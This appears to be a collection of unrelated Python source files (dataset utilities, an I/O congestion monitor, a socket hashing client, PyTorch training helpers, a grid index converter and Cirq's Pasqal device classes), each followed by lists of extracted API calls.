[((878, 916), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': 'sep'}), '(filename, delimiter=sep)\n', (891, 916), True, 'import numpy as np\n'), ((2885, 2928), 'numpy.savetxt', 'np.savetxt', (['filename', 'fullds'], {'delimiter': 'sep'}), '(filename, fullds, delimiter=sep)\n', (2895, 2928), True, 'import numpy as np\n'), ((5482, 5501), 'pandas.DataFrame', 'pd.DataFrame', (['stats'], {}), '(stats)\n', (5494, 5501), True, 'import pandas as pd\n'), ((446, 467), 'src.si.util.util.label_gen', 'label_gen', (['X.shape[1]'], {}), '(X.shape[1])\n', (455, 467), False, 'from src.si.util.util import label_gen\n'), ((4202, 4229), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4209, 4229), True, 'import numpy as np\n'), ((4250, 4276), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4256, 4276), True, 'import numpy as np\n'), ((4297, 4323), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4303, 4323), True, 'import numpy as np\n'), ((4344, 4370), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4350, 4370), True, 'import numpy as np\n'), ((4652, 4679), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4659, 4679), True, 'import numpy as np\n'), ((4700, 4726), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4706, 4726), True, 'import numpy as np\n'), ((4747, 4773), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4753, 4773), True, 'import numpy as np\n'), ((4794, 4820), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4800, 4820), True, 'import numpy as np\n'), ((2497, 2514), 'numpy.unique', 'np.unique', (['self.Y'], {}), '(self.Y)\n', (2506, 2514), True, 'import numpy as np\n')]
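A short usage sketch of the Dataset class and summary helper above; the CSV path, column layout, and the package import path are assumptions for illustration.

# Assumed import path, following the docstrings above (si.data.Dataset).
# from src.si.data.dataset import Dataset, summary

# Hypothetical numeric CSV whose last column holds the labels.
ds = Dataset.from_data("data/example.csv", sep=",", labeled=True)
print(len(ds), ds.getNumFeatures(), ds.getNumClasses())

# Round-trip through pandas and back.
df = ds.toDataframe()
ds2 = Dataset.from_dataframe(df, ylabel=ds.yname)

# Per-column statistics, either as a DataFrame or as a dict with format='dict'.
print(summary(ds2, format='df'))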
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright (c) 2016 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # import logging import os from io_monitor.constants import DOMAIN from io_monitor.utils.data_window import DataCollectionWindow LOG = logging.getLogger(DOMAIN) class DeviceDataCollector(object): # Moving average windows MA_WINDOW_SMA = 0 MA_WINDOW_MED = 1 MA_WINDOW_LAR = 2 # Device status STATUS_NORMAL = "N" STATUS_BUILDING = "B" STATUS_CONGESTED = "L" # Data tracked DATA_IOPS = "iops" DATA_AWAIT = "await" def __init__(self, device_node, data_elements, size_sma, size_med, size_lar): self.node = device_node if os.path.exists('/sys/block/' + self.node + '/dm/name'): self.name = open('/sys/block/' + self.node + '/dm/name', 'r').read().rstrip() else: self.name = self.node self.data_dict = {} self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1} self.timestamp = None self.congestion_status = self.STATUS_NORMAL self.congestion_await_minimal_spike = -1 self.congestion_await_sustained = -1 for element in data_elements: self.data_dict.update({element: [ DataCollectionWindow(size_sma, stuck_data_override=True), DataCollectionWindow(size_med, stuck_data_override=True), DataCollectionWindow(size_lar, stuck_data_override=True)]}) def update_congestion_status(self): # Bail if threshold is not set if self.congestion_await_sustained == -1: return ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) # Set the congestion status based on await moving average if self.congestion_status is self.STATUS_NORMAL: if ma_sma > self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING if self.congestion_status is self.STATUS_BUILDING: if ma_lar > self.congestion_await_sustained: self.congestion_status = self.STATUS_CONGESTED LOG.warn("Node %s (%s) is experiencing high await times." 
% (self.node, self.name)) elif ma_sma < self.congestion_await_sustained: self.congestion_status = self.STATUS_NORMAL if self.congestion_status is self.STATUS_CONGESTED: if ma_med < self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING def update_data(self, ts, element, value): self.timestamp = ts # LOG.debug("%s: e = %s, v= %f" % (self.node, element, value)) for w in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: self.data_dict[element][w].update(value, self.data_caps[element]) def get_latest(self, element): if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][self.MA_WINDOW_SMA].get_latest() def get_average(self, element, window): if window not in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: LOG.error("WindowError: invalid window requested = %s" % window) return 0 if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][window].get_average() def is_data_stale(self, ts): return not (ts == self.timestamp) def get_congestion_status(self, debug=False): if debug: ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" % (self.node, ma_sma, ma_med, ma_lar, self.congestion_await_sustained)) return self.congestion_status def set_data_caps(self, element, cap): if element in self.data_caps: self.data_caps[element] = cap def set_congestion_thresholds(self, await_minimal_spike, await_sustained_congestion): self.congestion_await_minimal_spike = await_minimal_spike self.congestion_await_sustained = await_sustained_congestion def get_element_windows_avg_list(self, element): return [self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR)] def get_element_windows_avg_string(self, element): return "%s [ %9.2f, %9.2f, %9.2f ]" % ( element, self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR))
[ "logging.getLogger", "os.path.exists", "io_monitor.utils.data_window.DataCollectionWindow" ]
[((270, 295), 'logging.getLogger', 'logging.getLogger', (['DOMAIN'], {}), '(DOMAIN)\n', (287, 295), False, 'import logging\n'), ((739, 793), 'os.path.exists', 'os.path.exists', (["('/sys/block/' + self.node + '/dm/name')"], {}), "('/sys/block/' + self.node + '/dm/name')\n", (753, 793), False, 'import os\n'), ((1336, 1392), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_sma'], {'stuck_data_override': '(True)'}), '(size_sma, stuck_data_override=True)\n', (1356, 1392), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1410, 1466), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_med'], {'stuck_data_override': '(True)'}), '(size_med, stuck_data_override=True)\n', (1430, 1466), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1484, 1540), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_lar'], {'stuck_data_override': '(True)'}), '(size_lar, stuck_data_override=True)\n', (1504, 1540), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n')]
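A sketch of how the collector above is meant to be driven from a sampling loop; it assumes the io_monitor package (and its DataCollectionWindow) is importable, and the device name, window sizes, thresholds, and readings are illustrative values.

collector = DeviceDataCollector('dm-0',
                                    data_elements=[DeviceDataCollector.DATA_IOPS,
                                                   DeviceDataCollector.DATA_AWAIT],
                                    size_sma=10, size_med=60, size_lar=300)
collector.set_congestion_thresholds(await_minimal_spike=100.0,
                                    await_sustained_congestion=1000.0)

# Each sampling period: push the latest iostat-style readings, then re-evaluate.
ts = 1234567890.0
collector.update_data(ts, DeviceDataCollector.DATA_AWAIT, 12.5)
collector.update_data(ts, DeviceDataCollector.DATA_IOPS, 430.0)
collector.update_congestion_status()
print(collector.get_congestion_status(debug=True))   # 'N', 'B' or 'L'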
from net_common import * import struct import sys def getDirHashOpts(withNames=False, ignoreThumbsFiles=True, ignoreUnixHiddenFiles=True, ignoreEmptyDirs=True): return bytearray([((1 if withNames else 0) + (2 if ignoreThumbsFiles else 0) + (4 if ignoreUnixHiddenFiles else 0) + (8 if ignoreEmptyDirs else 0))]) if __name__ == "__main__": sock = get_connected_local_socket() path = encodeString('/dev/shm/exampleDir') # path = encodeString('/dev/null') sock.sendall(bytearray(b'\x0A')) # HASH request # sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files) sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short sock.sendall(path) resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR if resp != b'\x00': print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0]) sys.exit(0) # print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size sock.close()
[ "sys.exit" ]
[((1201, 1212), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1209, 1212), False, 'import sys\n')]
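The dirHashOpts byte sent by getDirHashOpts() packs four flags into the low bits, so decoding it on the receiving side is a matter of bit tests. The variable names below are illustrative; only the bit layout comes from the client code above.

opts = getDirHashOpts(withNames=True, ignoreUnixHiddenFiles=False)[0]   # 1 + 2 + 0 + 8 == 0x0B

with_names          = bool(opts & 0x01)
ignore_thumbs_files = bool(opts & 0x02)
ignore_unix_hidden  = bool(opts & 0x04)
ignore_empty_dirs   = bool(opts & 0x08)
print(with_names, ignore_thumbs_files, ignore_unix_hidden, ignore_empty_dirs)
# True True False True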
'''Some helper functions for PyTorch, including:
    - progress_bar : progress bar mimicking xlua.progress.
    - set_lr : set the learning rate.
    - clip_gradient : clip gradients.
'''
import os
import sys
import time
import math

import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Function

# Get the number of rows and columns of the terminal.
if sys.platform == 'win32':
    term_width = 80
else:
    print('###', os.popen('stty size', 'r').read())
    _, term_width = os.popen('stty size', 'r').read().split()
    term_width = int(term_width)

TOTAL_BAR_LENGTH = 30.
last_time = time.time()
begin_time = last_time


# [==>........ 19/225 ...........]  | Loss: 1.961 | Acc: 22.000% (537/2432)
def progress_bar(current, total, msg=None):
    global last_time, begin_time
    if current == 0:
        begin_time = time.time()  # Reset for new bar.

    cur_len = int(TOTAL_BAR_LENGTH * current / total)
    rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1

    sys.stdout.write(' [')
    for i in range(cur_len):
        sys.stdout.write('=')
    sys.stdout.write('>')
    for i in range(rest_len):
        sys.stdout.write('.')
    sys.stdout.write(']')

    cur_time = time.time()
    step_time = cur_time - last_time
    last_time = cur_time
    tot_time = cur_time - begin_time

    L = []
    if msg:
        L.append(' | ' + msg)

    msg = ''.join(L)
    sys.stdout.write(msg)
    for i in range(term_width - int(TOTAL_BAR_LENGTH) - len(msg) - 3):
        sys.stdout.write(' ')

    # Go back to the center of the bar.
    for i in range(term_width - int(TOTAL_BAR_LENGTH / 2) + 2):
        sys.stdout.write('\b')
    sys.stdout.write(' %d/%d ' % (current + 1, total))

    if current < total - 1:
        sys.stdout.write('\r')
    else:
        sys.stdout.write('\n')
    sys.stdout.flush()


def set_lr(optimizer, lr):
    for group in optimizer.param_groups:
        group['lr'] = lr


def clip_gradient(optimizer, grad_clip):
    for group in optimizer.param_groups:
        # print(group['params'])
        for param in group['params']:
            param.grad.data.clamp_(-grad_clip, grad_clip)
[ "sys.stdout.flush", "os.popen", "time.time", "sys.stdout.write" ]
[((587, 598), 'time.time', 'time.time', ([], {}), '()\n', (596, 598), False, 'import time\n'), ((971, 993), 'sys.stdout.write', 'sys.stdout.write', (['""" ["""'], {}), "(' [')\n", (987, 993), False, 'import sys\n'), ((1060, 1081), 'sys.stdout.write', 'sys.stdout.write', (['""">"""'], {}), "('>')\n", (1076, 1081), False, 'import sys\n'), ((1149, 1170), 'sys.stdout.write', 'sys.stdout.write', (['"""]"""'], {}), "(']')\n", (1165, 1170), False, 'import sys\n'), ((1189, 1200), 'time.time', 'time.time', ([], {}), '()\n', (1198, 1200), False, 'import time\n'), ((1390, 1411), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\n', (1406, 1411), False, 'import sys\n'), ((1648, 1698), 'sys.stdout.write', 'sys.stdout.write', (["(' %d/%d ' % (current + 1, total))"], {}), "(' %d/%d ' % (current + 1, total))\n", (1664, 1698), False, 'import sys\n'), ((1806, 1824), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1822, 1824), False, 'import sys\n'), ((825, 836), 'time.time', 'time.time', ([], {}), '()\n', (834, 836), False, 'import time\n'), ((1033, 1054), 'sys.stdout.write', 'sys.stdout.write', (['"""="""'], {}), "('=')\n", (1049, 1054), False, 'import sys\n'), ((1122, 1143), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (1138, 1143), False, 'import sys\n'), ((1487, 1508), 'sys.stdout.write', 'sys.stdout.write', (['""" """'], {}), "(' ')\n", (1503, 1508), False, 'import sys\n'), ((1620, 1644), 'sys.stdout.write', 'sys.stdout.write', (['"""\x08"""'], {}), "('\\x08')\n", (1636, 1644), False, 'import sys\n'), ((1735, 1757), 'sys.stdout.write', 'sys.stdout.write', (["'\\r'"], {}), "('\\r')\n", (1751, 1757), False, 'import sys\n'), ((1778, 1800), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (1794, 1800), False, 'import sys\n'), ((422, 448), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (430, 448), False, 'import os\n'), ((475, 501), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (483, 501), False, 'import os\n')]
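Typical use of progress_bar inside a training loop; the batch count and metric values are illustrative, and the helper assumes a real terminal (term_width is read from stty at import time).

# Assumes the helper module above has been imported.
import time

num_batches = 100
for batch_idx in range(num_batches):
    time.sleep(0.01)  # stand-in for the actual forward/backward pass
    progress_bar(batch_idx, num_batches,
                 'Loss: %.3f | Acc: %.3f%% (%d/%d)' % (1.961, 22.0, 537, 2432))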
from __future__ import absolute_import, division, print_function

import logging
import sys

logging.basicConfig(
    stream=sys.stdout,
    level=logging.DEBUG,
    format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S')

import numpy as np

import utils

logger = logging.getLogger("indexconverter")


class IndexConverter(object):
    def __init__(self, ndim, ngrid):
        self.ndim = ndim
        self.ngrid = ngrid
        self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]
        self._zerodim = np.zeros((self.ndim,))
        self.nbins = int(np.rint((ngrid - 1) ** ndim))

    def convert_to_vector(self, grid):
        if grid.shape[0] != self.ngrid - 1:
            raise Exception("Wrong dimension of grid. Expected length of %s, got %s" %
                            (self.ngrid - 1, grid.shape[0]))
        vector = np.empty((self.nbins,))
        for bin_idx in range(self.nbins):
            vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]
        return vector

    def convert_to_grid(self, vector):
        grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))
        if len(vector.shape) > 1:
            grids = np.empty((len(vector),) + grid_shape)
            for idx, v in enumerate(vector):
                grids[idx] = self.convert_to_grid(v)
            return grids
        else:
            grid = np.zeros(grid_shape)
            for idx in range(len(vector)):
                grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]
            return grid

    def convert_to_grid_idx(self, bin_idx):
        if bin_idx >= self.nbins or bin_idx < 0:
            print(self.nbins, self.ndim, self.nbins ** self.ndim)
            raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx)
        grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)
        return grid_idx.astype(int)

    def convert_to_bin_idx(self, grid_idx):
        bin_idx = utils.rint(np.sum(grid_idx * self._modulus))
        if bin_idx >= self.nbins or bin_idx < 0:
            raise Exception(
                "Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins))
        return bin_idx
[ "logging.basicConfig", "logging.getLogger", "numpy.sum", "numpy.zeros", "numpy.empty", "numpy.rint" ]
[((93, 249), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'level': 'logging.DEBUG', 'format': '"""%(asctime)s %(name)s-%(levelname)s: %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(stream=sys.stdout, level=logging.DEBUG, format=\n '%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (112, 249), False, 'import logging\n'), ((298, 333), 'logging.getLogger', 'logging.getLogger', (['"""indexconverter"""'], {}), "('indexconverter')\n", (315, 333), False, 'import logging\n'), ((556, 578), 'numpy.zeros', 'np.zeros', (['(self.ndim,)'], {}), '((self.ndim,))\n', (564, 578), True, 'import numpy as np\n'), ((852, 875), 'numpy.empty', 'np.empty', (['(self.nbins,)'], {}), '((self.nbins,))\n', (860, 875), True, 'import numpy as np\n'), ((604, 632), 'numpy.rint', 'np.rint', (['((ngrid - 1) ** ndim)'], {}), '((ngrid - 1) ** ndim)\n', (611, 632), True, 'import numpy as np\n'), ((1384, 1404), 'numpy.zeros', 'np.zeros', (['grid_shape'], {}), '(grid_shape)\n', (1392, 1404), True, 'import numpy as np\n'), ((1993, 2025), 'numpy.sum', 'np.sum', (['(grid_idx * self._modulus)'], {}), '(grid_idx * self._modulus)\n', (1999, 2025), True, 'import numpy as np\n'), ((1084, 1103), 'numpy.zeros', 'np.zeros', (['self.ndim'], {}), '(self.ndim)\n', (1092, 1103), True, 'import numpy as np\n')]
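A round-trip sketch for the converter above: a 2-D grid with ngrid = 4 points per axis gives (ngrid - 1) ** ndim = 9 bins. It assumes the accompanying utils.rint helper rounds to the nearest integer, as its use above implies.

import numpy as np

converter = IndexConverter(ndim=2, ngrid=4)
print(converter.nbins)                       # 9

grid_idx = converter.convert_to_grid_idx(5)  # array([1, 2])
bin_idx = converter.convert_to_bin_idx(grid_idx)
print(grid_idx, bin_idx)                     # [1 2] 5

# A flat vector of nbins values can be viewed as a (3, 3) grid and back.
vector = np.arange(converter.nbins, dtype=float)
grid = converter.convert_to_grid(vector)
assert np.allclose(converter.convert_to_vector(grid), vector)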
# Copyright 2020 The Cirq Developers # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict import numpy as np import networkx as nx import cirq from cirq import _compat, GridQubit, LineQubit from cirq.ops import NamedQubit from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset @cirq.value.value_equality class PasqalDevice(cirq.devices.Device): """A generic Pasqal device. The most general of Pasqal devices, enforcing only restrictions expected to be shared by all future devices. Serves as the parent class of all Pasqal devices, but can also be used on its own for hosting a nearly unconstrained device. When used as a circuit's device, the qubits have to be of the type cirq.NamedQubit and assumed to be all connected, the idea behind it being that after submission, all optimization and transpilation necessary for its execution on the specified device are handled internally by Pasqal. """ def __init__(self, qubits: Sequence[cirq.Qid]) -> None: """Initializes a device with some qubits. Args: qubits (NamedQubit): Qubits on the device, exclusively unrelated to a physical position. Raises: TypeError: If the wrong qubit type is provided. ValueError: If the number of qubits is greater than the devices maximum. """ if len(qubits) > 0: q_type = type(qubits[0]) for q in qubits: if not isinstance(q, self.supported_qubit_type): raise TypeError( 'Unsupported qubit type: {!r}. This device ' 'supports qubit types: {}'.format(q, self.supported_qubit_type) ) if not type(q) is q_type: raise TypeError("All qubits must be of same type.") if len(qubits) > self.maximum_qubit_number: raise ValueError( 'Too many qubits. {} accepts at most {} ' 'qubits.'.format(type(self), self.maximum_qubit_number) ) self.gateset = PasqalGateset() self.qubits = qubits self._metadata = cirq.DeviceMetadata( qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b]) ) # pylint: enable=missing-raises-doc @property def supported_qubit_type(self): return (NamedQubit,) @property def maximum_qubit_number(self): return 100 @property def metadata(self): return self._metadata @_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15') def qubit_set(self) -> FrozenSet[cirq.Qid]: return frozenset(self.qubits) def qubit_list(self): return [qubit for qubit in self.qubits] def is_pasqal_device_op(self, op: cirq.Operation) -> bool: if not isinstance(op, cirq.Operation): raise ValueError('Got unknown operation:', op) return op in self.gateset def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. Args: operation: The operation to validate. Raises: ValueError: If the operation is not valid. NotImplementedError: If the operation is a measurement with an invert mask. 
""" if not isinstance(operation, cirq.GateOperation): raise ValueError("Unsupported operation") if not self.is_pasqal_device_op(operation): raise ValueError(f'{operation.gate!r} is not a supported gate') for qub in operation.qubits: if not isinstance(qub, self.supported_qubit_type): raise ValueError( '{} is not a valid qubit for gate {!r}. This ' 'device accepts gates on qubits of type: ' '{}'.format(qub, operation.gate, self.supported_qubit_type) ) if qub not in self.metadata.qubit_set: raise ValueError(f'{qub} is not part of the device.') if isinstance(operation.gate, cirq.MeasurementGate): if operation.gate.invert_mask != (): raise NotImplementedError( "Measurements on Pasqal devices don't support invert_mask." ) def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None: """Raises an error if the given circuit is invalid on this device. A circuit is invalid if any of its moments are invalid or if there is a non-empty moment after a moment with a measurement. Args: circuit: The circuit to validate Raises: ValueError: If the given circuit can't be run on this device """ super().validate_circuit(circuit) # Measurements must be in the last non-empty moment has_measurement_occurred = False for moment in circuit: if has_measurement_occurred: if len(moment.operations) > 0: raise ValueError("Non-empty moment after measurement") for operation in moment.operations: if isinstance(operation.gate, cirq.MeasurementGate): has_measurement_occurred = True def __repr__(self): return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})' def _value_equality_values_(self): return self.qubits def _json_dict_(self): return cirq.protocols.obj_to_dict_helper(self, ['qubits']) class PasqalVirtualDevice(PasqalDevice): """A Pasqal virtual device with qubits in 3d. A virtual representation of a Pasqal device, enforcing the constraints typically found in a physical device. The qubits can be positioned in 3d space, although 2d layouts will be supported sooner and are thus recommended. Only accepts qubits with physical placement. """ def __init__( self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]] ) -> None: """Initializes a device with some qubits. Args: control_radius: the maximum distance between qubits for a controlled gate. Distance is measured in units of the coordinates passed into the qubit constructor. qubits: Qubits on the device, identified by their x, y, z position. Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit. Raises: ValueError: if the wrong qubit type is provided or if invalid parameter is provided for control_radius.""" super().__init__(qubits) if not control_radius >= 0: raise ValueError('Control_radius needs to be a non-negative float.') if len(self.qubits) > 1: if control_radius > 3.0 * self.minimal_distance(): raise ValueError( 'Control_radius cannot be larger than 3 times' ' the minimal distance between qubits.' ) self.control_radius = control_radius self.gateset = PasqalGateset(include_additional_controlled_ops=False) self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate)) @property def supported_qubit_type(self): return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit) def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. 
Args: operation: the operation to validate Raises: ValueError: If the operation is not valid """ super().validate_operation(operation) # Verify that a controlled gate operation is valid if operation in self.controlled_gateset: for p in operation.qubits: for q in operation.qubits: if self.distance(p, q) > self.control_radius: raise ValueError(f"Qubits {p!r}, {q!r} are too far away") def validate_moment(self, moment: cirq.Moment): """Raises an error if the given moment is invalid on this device. Args: moment: The moment to validate. Raises: ValueError: If the given moment is invalid. """ super().validate_moment(moment) if len(moment) > 1: for operation in moment: if not isinstance(operation.gate, cirq.MeasurementGate): raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.") def minimal_distance(self) -> float: """Returns the minimal distance between two qubits in qubits. Args: qubits: qubit involved in the distance computation Raises: ValueError: If the device has only one qubit Returns: The minimal distance between qubits, in spacial coordinate units. """ if len(self.qubits) <= 1: raise ValueError("Two qubits to compute a minimal distance.") return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2]) def distance(self, p: Any, q: Any) -> float: """Returns the distance between two qubits. Args: p: qubit involved in the distance computation q: qubit involved in the distance computation Raises: ValueError: If p or q not part of the device Returns: The distance between qubits p and q. """ all_qubits = self.qubit_list() if p not in all_qubits or q not in all_qubits: raise ValueError("Qubit not part of the device.") if isinstance(p, GridQubit): return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2) if isinstance(p, LineQubit): return abs(p.x - q.x) return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2) def __repr__(self): return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format( self.control_radius, sorted(self.qubits) ) def _value_equality_values_(self) -> Any: return (self.control_radius, self.qubits) def _json_dict_(self) -> Dict[str, Any]: return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits']) @_compat.deprecated_class( deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).' ) class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates): """A gate converter for compatibility with Pasqal processors. Modified version of ConvertToNeutralAtomGates, where a new 'convert' method 'pasqal_convert' takes the 'keep' function as an input. """ def pasqal_convert( self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool] ) -> List[cirq.Operation]: def on_stuck_raise(bad): return TypeError( "Don't know how to work with {!r}. " "It isn't a native PasqalDevice operation, " "a 1 or 2 qubit gate with a known unitary, " "or composite.".format(bad) ) return cirq.protocols.decompose( op, keep=keep, intercepting_decomposer=self._convert_one, on_stuck_raise=None if self.ignore_failures else on_stuck_raise, )
[ "numpy.sqrt", "cirq.protocols.decompose", "cirq.AnyIntegerPowerGateFamily", "cirq._compat.deprecated", "networkx.from_edgelist", "cirq._compat.deprecated_class", "cirq.protocols.obj_to_dict_helper", "cirq_pasqal.PasqalGateset" ]
[((10990, 11116), 'cirq._compat.deprecated_class', '_compat.deprecated_class', ([], {'deadline': '"""v0.16"""', 'fix': '"""Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset())."""'}), "(deadline='v0.16', fix=\n 'Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).')\n", (11014, 11116), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((3091, 3179), 'cirq._compat.deprecated', '_compat.deprecated', ([], {'fix': '"""Use metadata.qubit_set() if applicable."""', 'deadline': '"""v0.15"""'}), "(fix='Use metadata.qubit_set() if applicable.', deadline=\n 'v0.15')\n", (3109, 3179), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((2636, 2651), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {}), '()\n', (2649, 2651), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((6074, 6125), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['qubits']"], {}), "(self, ['qubits'])\n", (6107, 6125), False, 'import cirq\n'), ((7717, 7771), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {'include_additional_controlled_ops': '(False)'}), '(include_additional_controlled_ops=False)\n', (7730, 7771), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((10519, 10582), 'numpy.sqrt', 'np.sqrt', (['((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'], {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\n', (10526, 10582), True, 'import numpy as np\n'), ((10917, 10986), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['control_radius', 'qubits']"], {}), "(self, ['control_radius', 'qubits'])\n", (10950, 10986), False, 'import cirq\n'), ((11843, 11999), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (['op'], {'keep': 'keep', 'intercepting_decomposer': 'self._convert_one', 'on_stuck_raise': '(None if self.ignore_failures else on_stuck_raise)'}), '(op, keep=keep, intercepting_decomposer=self.\n _convert_one, on_stuck_raise=None if self.ignore_failures else\n on_stuck_raise)\n', (11867, 11999), False, 'import cirq\n'), ((2747, 2815), 'networkx.from_edgelist', 'nx.from_edgelist', (['[(a, b) for a in qubits for b in qubits if a != b]'], {}), '([(a, b) for a in qubits for b in qubits if a != b])\n', (2763, 2815), True, 'import networkx as nx\n'), ((7819, 7865), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', (['cirq.CZPowGate'], {}), '(cirq.CZPowGate)\n', (7849, 7865), False, 'import cirq\n'), ((10378, 10430), 'numpy.sqrt', 'np.sqrt', (['((p.row - q.row) 